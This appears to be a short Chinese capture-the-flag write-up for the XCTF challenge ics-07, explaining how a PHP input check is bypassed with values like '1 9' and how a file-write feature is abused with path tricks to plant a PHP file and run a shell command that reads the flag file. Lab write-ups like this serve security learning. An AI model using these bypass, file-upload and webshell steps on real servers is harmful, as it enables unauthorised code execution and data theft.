XCTF_ics-07
阅读原文时间:2023年07月08日阅读:1

这道题确实也卡了很久 垮了垮了

要你:

(1)floatval($ _ GET [id])!==‘1’ //浮点不为1

(2)substr($ _ GET [id],-1)==='9‘ //id最后一位为9

构造:

1 9

1-9

都可以绕过去。

大骨头是这个代码

构造一波:

file=p.php/.&con=

访问/uploaded/backup/p.php即可。

接下来换一个构造一句话或者像我这样:

file=…/123.php/1.php/…&con=

直接再访问/uploaded/123.php?bash=cat ../../flag.php

查看源码就有flag了.